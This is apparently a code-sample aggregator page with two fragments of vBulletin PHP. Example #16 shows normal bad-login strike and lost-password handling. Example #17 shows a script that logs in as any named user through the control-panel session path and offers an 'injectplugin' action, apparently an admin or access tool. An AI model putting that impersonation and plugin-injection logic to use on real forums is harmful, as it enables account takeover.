     $valid_entries = FALSE;
     $messages['errors'][] = $message = "Please check your username and password.";
     $messages['fields'][] = $error_type = "username-member";
     $messages['errors'][] = $message = "";
     $messages['fields'][] = $error_type = "password-member";
     if ($vbulletin->options['usestrikesystem']) {
         $strikes = verify_strike_status($vbulletin->GPC['username']);
         exec_strike_user($vbulletin->GPC['username']);
         if ($strikes >= 4) {
Example #16
        } else {
            define('VB_ERROR_PERMISSION', true);
            $show['useurl'] = true;
            $show['specificerror'] = true;
            $url = $vbulletin->url;
            if ($vbulletin->options['usestrikesystem']) {
                eval(standard_error(fetch_error('badlogin_strikes_passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
            } else {
                eval(standard_error(fetch_error('badlogin_passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
            }
        }
    }
    exec_unstrike_user($vbulletin->GPC['vb_login_username']);
    $_postvars = @unserialize(verify_client_string($vbulletin->GPC['postvars']));
    // create new session
    process_new_login($_postvars['logintype'] ? $_postvars['logintype'] : $vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
    // do redirect
    do_login_redirect();
} else {
    if ($_GET['do'] == 'login') {
        // add consistency with previous behavior
        exec_header_redirect(fetch_seo_url('forumhome|nosession', array()));
    }
}
// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw') {
    $vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
    $email = $vbulletin->GPC['email'];
    $navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
    $navbar = render_navbar_template($navbits);
    // human verification
Example #17
        echo SELF;
        ?>
">Go back</a></p>
        <?php 
    }
    exit;
}
if (isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username'])) {
    require_once DIR . '/includes/functions_login.php';
    $username = $_REQUEST['username'];
    $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '******' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
    $query = $vbulletin->db->query_first($q);
    if ($query['username'] != null) {
        if (verify_authentication2($query['username'])) {
            exec_unstrike_user($query['username']);
            process_new_login('cplogin', true, null);
            do_login_redirect();
        } else {
            die('Verify failed');
        }
    } else {
        die('User not found.');
    }
} elseif ($_REQUEST['do'] == 'injectplugin') {
    $products = array();
    $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product WHERE active = '1'");
    if ($vbulletin->db->num_rows($query) > 0) {
        while ($product = $vbulletin->db->fetch_array($query)) {
            $productinfo = array();
            $productinfo['productid'] = $product['productid'];
            $productinfo['title'] = $product['title'];